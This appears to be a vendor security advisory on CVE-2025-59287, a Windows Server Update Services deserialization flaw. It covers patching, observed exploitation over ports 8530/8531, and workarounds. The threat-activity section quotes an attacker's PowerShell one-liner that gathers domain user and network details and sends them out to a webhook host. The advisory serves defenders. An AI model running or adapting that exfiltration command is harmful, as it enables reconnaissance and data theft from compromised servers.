Summary
On October 23, 2025, Microsoft released an out-of-band security update for a critical vulnerability tracked as CVE-2025-59287. The flaw stems from the deserialization of untrusted data in Windows Server Update Services (WSUS), which allows remote, unauthenticated threat actors to achieve remote code execution by sending a crafted event.
According to Microsoft, only Windows servers with the WSUS Server Role enabled are affected. This feature is not enabled by default.
While CVE-2025-59287 was originally patched in October’s Patch Tuesday update, Microsoft has indicated that the initial patch was not comprehensive, and this new update must be applied to fully mitigate the vulnerability. Threat actors have begun exploiting this vulnerability, which was added to CISA’s Known Exploited Vulnerabilities Catalog shortly after the new patch was released. Additionally, technical details and a proof-of-concept exploit is now available for CVE-2025-59287.
Threat Activity Targeting WSUS Servers
Arctic Wolf is currently observing a threat campaign targeting WSUS servers over port 8530 and 8531. We are not able to fully confirm if this campaign is directly related to CVE-2025-59287 at this time.
In each incident, a malicious PowerShell script was executed in a cmd process spawned by the IIS worker process, w3wp.exe or wsusservice.exe. The injected command executes net user /domain and ipconfig /all and redirects the output to a domain controlled by a threat actor.
try{$r= (&{echo https://REDACTED_IP:8531; net user /domain; ipconfig /all} |out-string)+ $Error }catch{$_.ToString()} ;$w=\”http://webhook[.]site/REDACTED\”;try{iwr -UseBasicParsing -Uri $w -Body $r -Method Put}catch{curl[.]exe -k $w –data-binary $r}
Recommendations for CVE-2025-59287
Upgrade to Latest Fixed Versions
Arctic Wolf strongly recommends that customers upgrade to the latest fixed versions of Windows Server to properly mitigate CVE-2025-59287 as recommended by Microsoft.
Install Arctic Wolf Agent & Sysmon
Arctic Wolf Agent and Sysmon provide Arctic Wolf with visibility into events needed to identify activity related to this campaign.
-
For instructions on how to install Arctic Wolf Agent, see the below install guides:
-
If you have a supported EDR solution deployed in your environment, please configure it for monitoring with Arctic Wolf.
Note: Arctic Wolf recommends following change management best practices for deploying Agent and Sysmon, including testing changes in a testing environment before deploying to production.
Workaround (Optional)
For users who are unable to immediately apply the October 23, 2025, out-of-band update, Microsoft has provided the following mitigations until the update can be applied:
-
Since only Windows servers with the WSUS Server Role enabled are vulnerable to CVE-2025-59287, disabling WSUS will mitigate the vulnerability. Note that clients will not receive updates from the server if WSUS is disabled.
-
Block inbound traffic to ports 8530 and 8531 on the host firewall (as opposed to blocking only at the network or perimeter firewall) to render WSUS non-operational.
